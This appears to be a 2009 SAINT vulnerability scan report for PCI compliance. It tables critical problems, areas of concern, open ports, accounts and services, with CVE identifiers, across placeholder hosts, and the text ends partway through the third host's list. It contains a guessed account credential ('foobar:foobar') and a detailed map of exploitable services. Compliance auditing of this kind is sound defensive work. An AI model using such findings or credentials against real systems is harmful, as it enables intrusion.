New ReportSave Report

July 8, 2009

1.0  Introduction

SAINT has determined that customer is not globally PCI compliant with the PCI scan validation requirement. The scan was conducted on June 29, 2009, at 3:01 PM. A heavy vulnerability assessment was conducted using the SAINT® 7.0 vulnerability scanner. The scan discovered a total of five live hosts, and detected 42 critical problems, 94 areas of concern, and 110 potential problems. The hosts and problems detected are discussed in greater detail in the following sections. This report was generated by a PCI Approved Scanning Vendor, SAINT Corporation, under certificate number 4268-01-02, within the guidelines of the PCI data security initiative.

2.0  Overview

The following vulnerability severity levels are used to categorize the vulnerabilities:

CRITICAL PROBLEMS
Vulnerabilities which pose an immediate threat to the network by allowing a remote attacker to directly gain read or write access, execute commands on the target, or create a denial of service.

AREAS OF CONCERN
Vulnerabilities which do not directly allow remote access, but do allow privilege elevation attacks, attacks on other targets using the vulnerable host as an intermediary, or gathering of passwords or configuration information which could be used to plan an attack.

POTENTIAL PROBLEMS
Warnings which may or may not be vulnerabilities, depending upon the patch level or configuration of the target. Further investigation on the part of the system administrator may be necessary.

SERVICES
Network services which accept client connections on a given TCP or UDP port. This is simply a count of network services, and does not imply that the service is or is not vulnerable.

The following tables present an overview of the hosts discovered on the network and the vulnerabilities contained therein.

2.1  Vulnerability List

This table presents an overview of the vulnerabilities detected on the network.


Host Name Severity Vulnerability / Service Class CVE CVSSv2 Base Score PCI Compliant?
host1.domain.com critical Download.Ject detected on web server Other     no
host1.domain.com critical Guessed password to windows account (foobar:foobar) Passwords     no
host1.domain.com critical MS FrontPage Server Extension Vulnerability: /_vti_bin/shtml.dll Web CVE-2003-0824 5.0 no
host1.domain.com critical MS FrontPage Server Extension Vulnerability: remote debug Web CVE-2003-0822 7.5 no
host1.domain.com critical Folder traversal in IIS (Double Decoding) Web CVE-2001-0333 7.5 no
host1.domain.com critical Folder traversal in IIS (Unicode Translation) Web CVE-2000-0884 7.5 no
host1.domain.com critical vulnerabilities in IIS 5 Web CVE-2000-0770 CVE-2001-0151 CVE-2001-0241 CVE-2001-0500 CVE-2001-0507 CVE-2002-0869 CVE-2002-1180 CVE-2002-1181 CVE-2002-1182 CVE-2003-0223 CVE-2003-0224 CVE-2003-0225 CVE-2003-0226 10.0 yes
host1.domain.com critical MailEnable HTTPMail vulnerability Mail CVE-2005-1348 CVE-2005-2222 CVE-2006-1338 10.0 yes
host1.domain.com critical MS Site Server default account Other CVE-2002-1769 CVE-2002-2073 CVE-2002-2081 7.5 no
host1.domain.com critical vulnerability in Windows Media Services (nsiislog.dll) Web CVE-2003-0227 CVE-2003-0349 7.5 no
host1.domain.com critical Windows Plug and Play vulnerability Windows OS CVE-2005-1983 10.0 no
host1.domain.com critical RPC runtime library vulnerability Windows OS CVE-2003-0807 CVE-2003-0813 CVE-2004-0116 CVE-2004-0124 5.1 no
host1.domain.com critical Windows 2000 ASN1 buffer overflow Windows OS CVE-2003-0818 7.5 no
host1.domain.com critical Windows 2000 RPC buffer overflow Windows OS CVE-2003-0352 7.5 no
host1.domain.com critical Windows COM+ command execution vulnerability Windows OS CVE-2005-1978 CVE-2005-1979 CVE-2005-1980 CVE-2005-2119 7.5 no
host1.domain.com critical Windows SMB Transaction response buffer overflow Windows OS CVE-2005-0045 7.5 no
host1.domain.com critical Windows SMB input validation vulnerability Windows OS CVE-2005-1206 7.5 no
host1.domain.com critical Windows TCP/IP vulnerabilities Windows OS CVE-2004-0230 CVE-2004-0790 CVE-2004-1060 CVE-2005-0048 CVE-2005-0688 7.5 yes
host1.domain.com critical Windows WMF gdi32.dll vulnerability Windows OS CVE-2005-4560 7.5 no
host1.domain.com critical pointer corruption vulnerability in WINS replication service Windows OS CVE-2004-0567 CVE-2004-1080 10.0 no
host1.domain.com critical Worm detected (Code Red II) Other     no
host1.domain.com concern Web server allows cross-site tracing Web     yes
host1.domain.com concern Windows DNS server allows cache poisoning DNS CVE-2001-1452 5.0 no
host1.domain.com concern Internet Explorer COM object memory corruption Windows OS CVE-2005-2127 7.5 no
host1.domain.com concern Internet Explorer Create Text Range code injection Windows OS CVE-2006-1185 CVE-2006-1186 CVE-2006-1188 CVE-2006-1189 CVE-2006-1190 CVE-2006-1191 CVE-2006-1192 CVE-2006-1245 CVE-2006-1359 CVE-2006-1388 10.0 no
host1.domain.com concern Internet Explorer JPEG buffer overflow Windows OS CVE-2005-1988 CVE-2005-1989 CVE-2005-1990 7.5 no
host1.domain.com concern Internet Explorer JS stack overflow Windows OS CVE-2006-0753 CVE-2006-0830 7.5 no
host1.domain.com concern Internet Explorer JavaScript vulnerability Windows OS CVE-2005-1790 CVE-2005-2829 CVE-2005-2830 CVE-2005-2831 7.5 no
host1.domain.com concern Internet Explorer PNG buffer overflow Windows OS CVE-2002-0648 CVE-2005-1211 5.1 no
host1.domain.com concern Internet Explorer URL parsing buffer overflow Windows OS CVE-2005-0553 CVE-2005-0554 CVE-2005-0555 7.5 no
host1.domain.com concern Internet Explorer WMF handling vulnerability Windows OS CVE-2006-0020 9.3 no
host1.domain.com concern vulnerability in License Logging Service Windows OS CVE-2005-0050 7.5 no
host1.domain.com concern AxWebRemoveCtrl ActiveX control enabled Web CVE-2005-3693 9.3 no
host1.domain.com concern CodeSupport ActiveX control enabled Web CVE-2005-3650 9.3 no
host1.domain.com concern null session access using alternate pipes Windows OS CVE-2005-2150 5.0 no
host1.domain.com concern Windows Plug and Play privilege elevation Windows OS CVE-2005-2120 6.5 no
host1.domain.com concern Run key allows write access Windows OS CVE-1999-0589 10.0 no
host1.domain.com concern Uninstall key allows write access Windows OS CVE-1999-0589 10.0 no
host1.domain.com concern Windows telephony service vulnerability Windows OS CVE-2005-0058 7.5 no
host1.domain.com concern DirectShow buffer overflow Windows OS CVE-2005-2128 5.0 no
host1.domain.com concern HTML Application Host vulnerability in Windows shell Windows OS CVE-2005-0063 7.5 no
host1.domain.com concern Microsoft Color Management Module buffer overflow Windows OS CVE-2005-1219 7.5 no
host1.domain.com concern Microsoft Data Access Component vulnerability Windows OS CVE-2006-0003 5.1 no
host1.domain.com concern Windows DHTML Editing Component vulnerability Windows OS CVE-2004-1319 5.0 no
host1.domain.com concern Windows Explorer COM object command execution Windows OS CVE-2004-2289 CVE-2006-0012 10.0 no
host1.domain.com concern Windows Hyperlink Object Library buffer overflow Windows OS CVE-2005-0057 7.5 no
host1.domain.com concern Windows Kernel privilege elevation vulnerability Windows OS CVE-2005-2827 7.2 no
host1.domain.com concern Windows Media Player plug-in EMBED vulnerability Windows OS CVE-2006-0005 9.3 no
host1.domain.com concern Windows Web Fonts vulnerability Windows OS CVE-2006-0010 7.5 no
host1.domain.com concern Windows shortcut file command execution Windows OS CVE-2005-2117 CVE-2005-2118 CVE-2005-2122 10.0 no
host1.domain.com concern vulnerable WinZip version: 8.0 Other CVE-2001-0449 CVE-2004-1465 4.6 no
host1.domain.com potential guessable read community string Networking/SNMP CVE-1999-0516 CVE-1999-0517 7.5 no
host1.domain.com potential Internet Explorer Shell.Explorer object enabled Windows OS CVE-2004-0985 10.0 no
host1.domain.com potential Javaprxy.dll access through Internet Explorer Windows OS CVE-2005-2087 5.0 no
host1.domain.com potential last user name shown in login box Windows OS CVE-1999-0592 10.0 no
host1.domain.com potential MailEnable Enterprise 1.04 may be vulnerable Mail CVE-2005-1013 CVE-2005-1781 CVE-2005-2223 5.0 no
host1.domain.com potential possible vulnerability in MailEnable Enterprise IMAP 1.04 Mail CVE-2005-1014 CVE-2005-1015 CVE-2005-2278 CVE-2005-3155 CVE-2005-3690 CVE-2005-3691 CVE-2005-3813 CVE-2005-3993 CVE-2005-4402 CVE-2005-4456 CVE-2005-4457 CVE-2006-0504 10.0 no
host1.domain.com potential possible vulnerability in MailEnable Enterprise POP3 1.04 Mail CVE-2006-1337 7.5 no
host1.domain.com potential possible vulnerability in MailEnable POP3 0 Mail     yes
host1.domain.com potential excessive null session access Windows OS CVE-2000-1200 5.0 no
host1.domain.com potential Possible ODBC RDS Vulnerability Web CVE-1999-1011 CVE-2002-1142 10.0 no
host1.domain.com potential chargen could be used in UDP bomb Networking/SNMP CVE-1999-0103 5.0 no
host1.domain.com potential pop receives password in clear Mail     yes
host1.domain.com potential possible vulnerability in PPTP service Other CVE-2002-1214 7.5 no
host1.domain.com potential SNMP is enabled and may be vulnerable Networking/SNMP CVE-1999-0615 CVE-2002-0012 CVE-2002-0013 CVE-2002-0053 CVE-2002-0796 CVE-2002-0797 10.0 no
host1.domain.com potential TCP reset using approximate sequence number Other CVE-2004-0230 5.0 no
host1.domain.com potential password complexity policy disabled Windows OS CVE-1999-0535 10.0 no
host1.domain.com potential weak account lockout policy (0) Windows OS CVE-1999-0582 5.0 no
host1.domain.com potential weak minimum password age policy (0 days) Windows OS CVE-1999-0535 10.0 no
host1.domain.com potential weak minimum password length policy (0) Windows OS CVE-1999-0535 10.0 no
host1.domain.com potential weak password history policy (0) Windows OS CVE-1999-0535 10.0 no
host1.domain.com potential non-administrative users can act as part of the operating system Windows OS CVE-1999-0534 4.6 no
host1.domain.com potential non-administrative users can bypass traverse checking Windows OS CVE-1999-0534 4.6 no
host1.domain.com potential non-administrative users can create token object Windows OS CVE-1999-0534 4.6 no
host1.domain.com potential auditing is disabled Windows OS CVE-1999-0575 7.5 no
host1.domain.com potential Password never expires for user LDAP_Anonymous Windows OS     yes
host1.domain.com potential Password never expires for user foobar Windows OS     no
host1.domain.com potential Client Service for Netware vulnerability Windows OS CVE-2005-1985 7.5 no
host1.domain.com potential Collaboration Data Objects vulnerability Windows OS CVE-2005-1987 7.5 no
host1.domain.com potential FTP Client vulnerability Windows OS CVE-2005-2126 2.6 yes
host1.domain.com potential Jet Database Engine input validation problems Windows OS CVE-2005-0944 7.5 no
host1.domain.com potential Microsoft Agent spoofing vulnerability Windows OS CVE-2005-1214 5.1 no
host1.domain.com potential Network Connection Manager vulnerability Windows OS CVE-2005-2307 5.0 no
host1.domain.com potential Win2000 SP2 Security Rollup 1 not installed Windows OS CVE-1999-0662 10.0 no
host1.domain.com potential Windows 2000 SP4 Update Rollup 1 not applied Windows OS CVE-2005-3168 CVE-2005-3169 CVE-2005-3170 CVE-2005-3171 CVE-2005-3172 CVE-2005-3173 CVE-2005-3174 CVE-2005-3175 CVE-2005-3176 CVE-2005-3177 7.5 no
host1.domain.com potential Windows Media Player URL script execution Windows OS CVE-2003-1107 5.1 no
host1.domain.com potential potential vulnerability in WINS Windows OS CVE-2003-0825 7.5 no
host1.domain.com service 17/TCP        
host1.domain.com service 17/UDP        
host1.domain.com service 42/TCP        
host1.domain.com service 1027/TCP        
host1.domain.com service 1028/TCP        
host1.domain.com service 1031/UDP        
host1.domain.com service 1033/TCP        
host1.domain.com service 1035/UDP        
host1.domain.com service 1036/TCP        
host1.domain.com service 1037/UDP        
host1.domain.com service 1038/TCP        
host1.domain.com service 1039/TCP        
host1.domain.com service 1041/UDP        
host1.domain.com service 1043/UDP        
host1.domain.com service 1645/UDP        
host1.domain.com service 1646/UDP        
host1.domain.com service 1701/UDP        
host1.domain.com service 1723/TCP        
host1.domain.com service 1755/TCP        
host1.domain.com service 1755/UDP        
host1.domain.com service 1813/UDP        
host1.domain.com service 3372/TCP        
host1.domain.com service 6666/TCP        
host1.domain.com service 7007/TCP        
host1.domain.com service 7778/TCP        
host1.domain.com service 8081/TCP        
host1.domain.com service DNS        
host1.domain.com service IMAP        
host1.domain.com service POP        
host1.domain.com service SMB        
host1.domain.com service SMTP        
host1.domain.com service SNMP        
host1.domain.com service WWW        
host1.domain.com service WWW (Secure)        
host1.domain.com service WWW (non-standard port 8080)        
host1.domain.com service bootpc (68/UDP)        
host1.domain.com service bootps (67/UDP)        
host1.domain.com service chargen (19/TCP)        
host1.domain.com service chargen:UDP (19/UDP)        
host1.domain.com service daytime (13/TCP)        
host1.domain.com service daytime (13/UDP)        
host1.domain.com service discard (9/TCP)        
host1.domain.com service discard (9/UDP)        
host1.domain.com service domain (53/TCP)        
host1.domain.com service domain (53/UDP)        
host1.domain.com service echo (7/TCP)        
host1.domain.com service echo (7/UDP)        
host1.domain.com service epmap (135/TCP)        
host1.domain.com service epmap (135/UDP)        
host1.domain.com service isakmp (500/UDP)        
host1.domain.com service microsoft-ds (445/TCP)        
host1.domain.com service microsoft-ds (445/UDP)        
host1.domain.com service name (42/UDP)        
host1.domain.com service netbios-dgm (138/UDP)        
host1.domain.com service netbios-ns (137/UDP)        
host1.domain.com service printer (515/TCP)        
host1.domain.com service radius (1812/UDP)        
host1.domain.com info User: Administrator        
host1.domain.com info User: DHCP Administrators        
host1.domain.com info User: DHCP Users        
host1.domain.com info User: Guest        
host1.domain.com info User: IME_ADMIN        
host1.domain.com info User: IME_USER        
host1.domain.com info User: IUSR_HOST1        
host1.domain.com info User: IWAM_HOST1        
host1.domain.com info User: LDAP_Anonymous        
host1.domain.com info User: NetShow Administrators        
host1.domain.com info User: NetShowServices        
host1.domain.com info User: TsInternetUser        
host1.domain.com info User: WINS Users        
host1.domain.com info User: foobar        
host1.domain.com info Windows service: Alerter        
host1.domain.com info Windows service: COM+ Event System        
host1.domain.com info Windows service: Computer Browser        
host1.domain.com info Windows service: DHCP Client        
host1.domain.com info Windows service: DHCP Server        
host1.domain.com info Windows service: DNS Client        
host1.domain.com info Windows service: DNS Server        
host1.domain.com info Windows service: Distributed File System        
host1.domain.com info Windows service: Distributed Link Tracking Client        
host1.domain.com info Windows service: Distributed Transaction Coordinator        
host1.domain.com info Windows service: Event Log        
host1.domain.com info Windows service: FTP Publishing Service        
host1.domain.com info Windows service: IIS Admin Service        
host1.domain.com info Windows service: IPSEC Policy Agent        
host1.domain.com info Windows service: Internet Authentication Service        
host1.domain.com info Windows service: License Logging Service        
host1.domain.com info Windows service: Logical Disk Manager        
host1.domain.com info Windows service: MailEnable HTTPMail Service        
host1.domain.com info Windows service: MailEnable IMAP Service        
host1.domain.com info Windows service: MailEnable List Connector        
host1.domain.com info Windows service: MailEnable Mail Transfer Agent        
host1.domain.com info Windows service: MailEnable Management Service        
host1.domain.com info Windows service: MailEnable POP Connector        
host1.domain.com info Windows service: MailEnable POP Service        
host1.domain.com info Windows service: MailEnable Postoffice Connector        
host1.domain.com info Windows service: MailEnable SMTP Connector        
host1.domain.com info Windows service: Messenger        
host1.domain.com info Windows service: NT LM Security Support Provider        
host1.domain.com info Windows service: Net Logon        
host1.domain.com info Windows service: Plug and Play        
host1.domain.com info Windows service: Print Server for Macintosh        
host1.domain.com info Windows service: Print Spooler        
host1.domain.com info Windows service: Protected Storage        
host1.domain.com info Windows service: Remote Access Connection Manager        
host1.domain.com info Windows service: Remote Procedure Call (RPC)        
host1.domain.com info Windows service: Remote Registry Service        
host1.domain.com info Windows service: Removable Storage        
host1.domain.com info Windows service: Routing and Remote Access        
host1.domain.com info Windows service: RunAs Service        
host1.domain.com info Windows service: SNMP Service        
host1.domain.com info Windows service: Security Accounts Manager        
host1.domain.com info Windows service: Server        
host1.domain.com info Windows service: Simple Mail Transport Protocol (SMTP)        
host1.domain.com info Windows service: Simple TCP/IP Services        
host1.domain.com info Windows service: System Event Notification        
host1.domain.com info Windows service: TCP/IP NetBIOS Helper Service        
host1.domain.com info Windows service: TCP/IP Print Server        
host1.domain.com info Windows service: Task Scheduler        
host1.domain.com info Windows service: Telephony        
host1.domain.com info Windows service: Windows Internet Name Service (WINS)        
host1.domain.com info Windows service: Windows Management Instrumentation        
host1.domain.com info Windows service: Windows Management Instrumentation Driver Extensions        
host1.domain.com info Windows service: Windows Media Monitor Service        
host1.domain.com info Windows service: Windows Media Program Service        
host1.domain.com info Windows service: Windows Media Station Service        
host1.domain.com info Windows service: Windows Media Unicast Service        
host1.domain.com info Windows service: Windows Time        
host1.domain.com info Windows service: Workstation        
host1.domain.com info Windows service: World Wide Web Publishing Service        
host2.domain.com critical Guessed password to windows account (foobar:foobar) Passwords     no
host2.domain.com critical Windows print spooler vulnerability Print Services CVE-2005-1984 7.5 yes
host2.domain.com critical RPC runtime library vulnerability Windows OS CVE-2003-0807 CVE-2003-0813 CVE-2004-0116 CVE-2004-0124 5.1 no
host2.domain.com critical Win2003 RPC buffer overflow Windows OS CVE-2003-0352 7.5 no
host2.domain.com critical Windows SMB Transaction response buffer overflow Windows OS CVE-2005-0045 7.5 no
host2.domain.com critical Windows SMB input validation vulnerability Windows OS CVE-2005-1206 7.5 no
host2.domain.com critical Windows TCP/IP vulnerabilities Windows OS CVE-2004-0230 CVE-2004-0790 CVE-2004-1060 CVE-2005-0048 CVE-2005-0688 7.5 yes
host2.domain.com critical Windows WMF gdi32.dll vulnerability Windows OS CVE-2005-4560 7.5 no
host2.domain.com concern Internet Explorer COM object memory corruption Windows OS CVE-2005-2127 7.5 no
host2.domain.com concern Internet Explorer Create Text Range code injection Windows OS CVE-2006-1185 CVE-2006-1186 CVE-2006-1188 CVE-2006-1189 CVE-2006-1190 CVE-2006-1191 CVE-2006-1192 CVE-2006-1245 CVE-2006-1359 CVE-2006-1388 10.0 no
host2.domain.com concern Internet Explorer JPEG buffer overflow Windows OS CVE-2005-1988 CVE-2005-1989 CVE-2005-1990 7.5 no
host2.domain.com concern Internet Explorer JS stack overflow Windows OS CVE-2006-0753 CVE-2006-0830 7.5 no
host2.domain.com concern Internet Explorer JavaScript vulnerability Windows OS CVE-2005-1790 CVE-2005-2829 CVE-2005-2830 CVE-2005-2831 7.5 no
host2.domain.com concern Internet Explorer PNG buffer overflow Windows OS CVE-2002-0648 CVE-2005-1211 5.1 no
host2.domain.com concern Internet Explorer URL parsing buffer overflow Windows OS CVE-2005-0553 CVE-2005-0554 CVE-2005-0555 7.5 no
host2.domain.com concern Outlook Express Windows Address Book vulnerability Mail CVE-2006-0014 5.1 no
host2.domain.com concern CodeSupport ActiveX control enabled Web CVE-2005-3650 9.3 no
host2.domain.com concern Sunncomm ActiveX control enabled Web     no
host2.domain.com concern Windows Plug and Play vulnerability Windows OS CVE-2005-1983 10.0 no
host2.domain.com concern Run key allows write access Windows OS CVE-1999-0589 10.0 no
host2.domain.com concern Uninstall key allows write access Windows OS CVE-1999-0589 10.0 no
host2.domain.com concern DACL privilege elevation Windows OS CVE-2006-0023 4.3 no
host2.domain.com concern DirectShow buffer overflow Windows OS CVE-2005-2128 5.0 no
host2.domain.com concern Microsoft Color Management Module buffer overflow Windows OS CVE-2005-1219 7.5 no
host2.domain.com concern Microsoft Data Access Component vulnerability Windows OS CVE-2006-0003 5.1 no
host2.domain.com concern Windows COM+ command execution vulnerability Windows OS CVE-2005-1978 CVE-2005-1979 CVE-2005-1980 CVE-2005-2119 7.5 no
host2.domain.com concern Windows EMF/WMF image file vulnerability Windows OS CVE-2005-0803 CVE-2005-2123 CVE-2005-2124 7.6 no
host2.domain.com concern Windows Explorer COM object command execution Windows OS CVE-2004-2289 CVE-2006-0012 10.0 no
host2.domain.com concern Windows HTML Help integer overflow Windows OS CVE-2005-1208 10.0 no
host2.domain.com concern Windows Hyperlink Object Library buffer overflow Windows OS CVE-2005-0057 7.5 no
host2.domain.com concern Windows Media Player PNG image vulnerability Windows OS CVE-2004-1244 7.5 no
host2.domain.com concern Windows Media Player bmp buffer overflow Windows OS CVE-2006-0006 9.3 no
host2.domain.com concern Windows Media Player plug-in EMBED vulnerability Windows OS CVE-2006-0005 9.3 no
host2.domain.com concern Windows OLE input validation vulnerability Windows OS CVE-2005-0044 CVE-2005-0047 7.5 no
host2.domain.com concern Windows Web Fonts vulnerability Windows OS CVE-2006-0010 7.5 no
host2.domain.com concern Windows shortcut file command execution Windows OS CVE-2005-2117 CVE-2005-2118 CVE-2005-2122 10.0 no
host2.domain.com concern Windows telnet client session variable disclosure Windows OS CVE-2005-1205 5.0 no
host2.domain.com potential Internet Explorer ADODB.Stream object enabled Windows OS     yes
host2.domain.com potential Internet Explorer Shell.Explorer object enabled Windows OS CVE-2004-0985 10.0 no
host2.domain.com potential Javaprxy.dll access through Internet Explorer Windows OS CVE-2005-2087 5.0 no
host2.domain.com potential last user name shown in login box Windows OS CVE-1999-0592 10.0 no
host2.domain.com potential Outlook Express NNTP buffer overflow Mail CVE-2005-1213 7.5 no
host2.domain.com potential User newuser has never logged in Windows OS     yes
host2.domain.com potential password complexity policy disabled Windows OS CVE-1999-0535 10.0 no
host2.domain.com potential weak account lockout policy (0) Windows OS CVE-1999-0582 5.0 no
host2.domain.com potential weak minimum password age policy (0 days) Windows OS CVE-1999-0535 10.0 no
host2.domain.com potential weak minimum password length policy (0) Windows OS CVE-1999-0535 10.0 no
host2.domain.com potential weak password history policy (0) Windows OS CVE-1999-0535 10.0 no
host2.domain.com potential non-administrative users can bypass traverse checking Windows OS CVE-1999-0534 4.6 no
host2.domain.com potential non-administrative users can replace a process level token Windows OS CVE-1999-0534 4.6 no
host2.domain.com potential account management auditing disabled Windows OS CVE-1999-0575 7.5 no
host2.domain.com potential account management failure auditing disabled Windows OS CVE-1999-0575 7.5 no
host2.domain.com potential logon failure auditing disabled Windows OS CVE-1999-0575 7.5 no
host2.domain.com potential object access auditing disabled Windows OS CVE-1999-0575 7.5 no
host2.domain.com potential object access failure auditing disabled Windows OS CVE-1999-0575 7.5 no
host2.domain.com potential policy change auditing disabled Windows OS CVE-1999-0575 7.5 no
host2.domain.com potential policy change failure auditing disabled Windows OS CVE-1999-0575 7.5 no
host2.domain.com potential system event auditing disabled Windows OS CVE-1999-0575 7.5 no
host2.domain.com potential system event failure auditing disabled Windows OS CVE-1999-0575 7.5 no
host2.domain.com potential Password never expires for user foobar Windows OS     no
host2.domain.com potential Windows TCP/IP Stack not hardened Other CVE-2005-0688 CVE-2005-1649 5.0 no
host2.domain.com potential Client Service for Netware vulnerability Windows OS CVE-2005-1985 7.5 no
host2.domain.com potential Collaboration Data Objects vulnerability Windows OS CVE-2005-1987 7.5 no
host2.domain.com potential FTP Client vulnerability Windows OS CVE-2005-2126 2.6 yes
host2.domain.com potential Jet Database Engine input validation problems Windows OS CVE-2005-0944 7.5 no
host2.domain.com potential Microsoft Agent spoofing vulnerability Windows OS CVE-2005-1214 5.1 no
host2.domain.com potential Network Connection Manager vulnerability Windows OS CVE-2005-2307 5.0 no
host2.domain.com potential Windows Media Player URL script execution Windows OS CVE-2003-1107 5.1 no
host2.domain.com service 33430/UDP        
host2.domain.com service 33431/UDP        
host2.domain.com service 33432/UDP        
host2.domain.com service 33433/UDP        
host2.domain.com service 33434/UDP        
host2.domain.com service 33435/UDP        
host2.domain.com service 33436/UDP        
host2.domain.com service 33437/UDP        
host2.domain.com service 1/UDP        
host2.domain.com service 1025/TCP        
host2.domain.com service 1026/TCP        
host2.domain.com service SMB        
host2.domain.com service epmap (135/TCP)        
host2.domain.com service isakmp (500/UDP)        
host2.domain.com service microsoft-ds (445/TCP)        
host2.domain.com service microsoft-ds (445/UDP)        
host2.domain.com service netbios-dgm (138/UDP)        
host2.domain.com service netbios-ns (137/UDP)        
host2.domain.com service ntp (123/UDP)        
host2.domain.com info User: Administrator        
host2.domain.com info User: Guest        
host2.domain.com info User: HelpServicesGroup        
host2.domain.com info User: SUPPORT_388945a0        
host2.domain.com info User: TelnetClients        
host2.domain.com info User: foobar        
host2.domain.com info User: newuser        
host2.domain.com info Windows service: Automatic Updates        
host2.domain.com info Windows service: COM+ Event System        
host2.domain.com info Windows service: Computer Browser        
host2.domain.com info Windows service: Cryptographic Services        
host2.domain.com info Windows service: DHCP Client        
host2.domain.com info Windows service: DNS Client        
host2.domain.com info Windows service: Distributed File System        
host2.domain.com info Windows service: Distributed Link Tracking Client        
host2.domain.com info Windows service: Distributed Transaction Coordinator        
host2.domain.com info Windows service: Error Reporting Service        
host2.domain.com info Windows service: Event Log        
host2.domain.com info Windows service: Help and Support        
host2.domain.com info Windows service: IPSEC Services        
host2.domain.com info Windows service: Logical Disk Manager        
host2.domain.com info Windows service: MCPop3 Service        
host2.domain.com info Windows service: MCSmtp Service        
host2.domain.com info Windows service: Net Logon        
host2.domain.com info Windows service: Plug and Play        
host2.domain.com info Windows service: Print Spooler        
host2.domain.com info Windows service: Protected Storage        
host2.domain.com info Windows service: Remote Procedure Call (RPC)        
host2.domain.com info Windows service: Remote Registry        
host2.domain.com info Windows service: Secondary Logon        
host2.domain.com info Windows service: Security Accounts Manager        
host2.domain.com info Windows service: Server        
host2.domain.com info Windows service: Shell Hardware Detection        
host2.domain.com info Windows service: System Event Notification        
host2.domain.com info Windows service: TCP/IP NetBIOS Helper        
host2.domain.com info Windows service: Task Scheduler        
host2.domain.com info Windows service: Terminal Services        
host2.domain.com info Windows service: Windows Audio        
host2.domain.com info Windows service: Windows Management Instrumentation        
host2.domain.com info Windows service: Windows Time        
host2.domain.com info Windows service: Wireless Configuration        
host2.domain.com info Windows service: Workstation        
host3.domain.com critical cachefsd may be vulnerable RPC CVE-2002-0033 CVE-2002-0084 10.0 no
host3.domain.com critical Calendar Manager service may be vulnerable RPC CVE-1999-0320 CVE-1999-0696 10.0 no
host3.domain.com critical possible buffer overflow in dtspcd Other CVE-2001-0803 10.0 no
host3.domain.com critical rpc.walld service may be vulnerable RPC CVE-2002-0573 7.5 no
host3.domain.com critical sadmind may be vulnerable to buffer overflow RPC CVE-1999-0977 10.0 no
host3.domain.com critical Vulnerable Sendmail version: 8.6 Mail CVE-1999-0129 CVE-1999-0131 CVE-1999-0203 CVE-1999-0204 CVE-1999-1109 CVE-1999-1309 CVE-2000-0319 CVE-2002-1337 CVE-2003-0161 CVE-2003-0681 CVE-2003-0694 CVE-2006-0058 10.0 no
host3.domain.com critical SNMP to DMI mapper may be vulnerable Networking/SNMP CVE-2001-0236 10.0 no
host3.domain.com critical possible vulnerability in Sun lpd Print Services CVE-2001-0353 10.0 no
host3.domain.com critical possible format string vulnerability in tooltalk RPC CVE-2001-0717 10.0 no
host3.domain.com critical possible input validation error in tooltalk RPC CVE-2002-0677 CVE-2002-0678 7.5 no
host3.domain.com critical tooltalk version may be vulnerable to buffer overflow RPC CVE-1999-0003 CVE-1999-0693 CVE-2002-0679 10.0 no
host3.domain.com concern Excessive finger information Other CVE-1999-0612   yes
host3.domain.com concern Solaris fingerd user list disclosure Other CVE-2001-1503 2.1 yes
host3.domain.com concern Information from rusersd could help hacker RPC CVE-1999-0626   yes
host3.domain.com concern signal handling race condition in Sendmail Mail CVE-2001-1349 3.7 yes
host3.domain.com potential possible vulnerability in dtlogin Other CVE-2004-0368 10.0 no
host3.domain.com potential Possible globbing vulnerability in SunOS ftpd File Transfer CVE-2001-0249 10.0 no
host3.domain.com potential KCMS server may be vulnerable RPC CVE-2003-0027 5.0 no
host3.domain.com potential possible vulnerability in login Login/Shell CVE-2001-0797 10.0 no
host3.domain.com potential chargen could be used in UDP bomb Networking/SNMP CVE-1999-0103 5.0 no
host3.domain.com potential rlogin is enabled Login/Shell CVE-1999-0651 7.5 no
host3.domain.com potential rshd is enabled Login/Shell CVE-1999-0651 7.5 no
host3.domain.com potential rexec is enabled and could help attacker Login/Shell CVE-1999-0618 10.0 no
host3.domain.com potential rpc.statd is enabled and may be vulnerable RPC CVE-1999-0018 CVE-1999-0019 CVE-1999-0210 CVE-1999-0493 CVE-2000-0666 10.0 no
host3.domain.com potential Information from rstatd could help hacker RPC CVE-1999-0624   yes
host3.domain.com potential Sendmail command EXPN is enabled Mail CVE-1999-0531   yes
host3.domain.com potential Sendmail command VRFY is enabled Mail CVE-1999-0531   yes
host3.domain.com potential SMTP may be a mail relay Mail CVE-1999-0512 10.0 no
host3.domain.com potential SNMP is enabled and may be vulnerable Networking/SNMP CVE-1999-0615 CVE-2002-0012 CVE-2002-0013 CVE-2002-0053 CVE-2002-0796 CVE-2002-0797 10.0 no
host3.domain.com potential sunrpc services may be vulnerable RPC CVE-2002-0391 CVE-2003-0028 10.0 no
host3.domain.com potential possible buffer overflow in telnetd telrcv Login/Shell CVE-2001-0554 10.0 no
host3.domain.com potential Possible vulnerability in X font server Other CVE-2002-1317 7.5 no
host3.domain.com service 4045/TCP        
host3.domain.com service 6112/TCP        
host3.domain.com service 7100/TCP        
host3.domain.com service FTP        
host3.domain.com service Finger        
host3.domain.com service SMTP        
host3.domain.com service SNMP        
host3.domain.com service Telnet        
host3.domain.com service X-0 (6000/TCP)        
host3.domain.com service XDM (X login)        
host3.domain.com service chargen (19/TCP)        
host3.domain.com service chargen:UDP (19/UDP)        
host3.domain.com service daytime (13/TCP)        
host3.domain.com service daytime (13/UDP)        
host3.domain.com service discard (9/TCP)        
host3.domain.com service discard (9/UDP)        
host3.domain.com service echo (7/TCP)        
host3.domain.com service echo (7/UDP)        
host3.domain.com service exec (512/TCP)        
host3.domain.com service login (513/TCP)        
host3.domain.com service name (42/UDP)        
host3.domain.com service printer (515/TCP)        
host3.domain.com service shell (514/TCP)        
host3.domain.com service sunrpc (111/TCP)        
host3.domain.com service sunrpc (111/UDP)        
host3.domain.com service time (37/TCP)        
host3.domain.com service time (37/UDP)        
host3.domain.com service uucp (540/TCP)        
host3.domain.com info RPC service: 100000-2 portmapper (111/tcp)        
host3.domain.com info RPC service: 100000-2 portmapper (111/udp)        
host3.domain.com info RPC service: 100000-3 portmapper (111/tcp)        
host3.domain.com info RPC service: 100000-3 portmapper (111/udp)        
host3.domain.com info RPC service: 100000-4 portmapper (111/tcp)        
host3.domain.com info RPC service: 100000-4 portmapper (111/udp)        
host3.domain.com info RPC service: 100001-2 rstatd (32778/udp)        
host3.domain.com info RPC service: 100001-3 rstatd (32778/udp)        
host3.domain.com info RPC service: 100001-4 rstatd (32778/udp)        
host3.domain.com info RPC service: 100002-2 rusersd (32772/tcp)        
host3.domain.com info RPC service: 100002-2 rusersd (32775/udp)        
host3.domain.com info RPC service: 100002-3 rusersd (32772/tcp)        
host3.domain.com info RPC service: 100002-3 rusersd (32775/udp)        
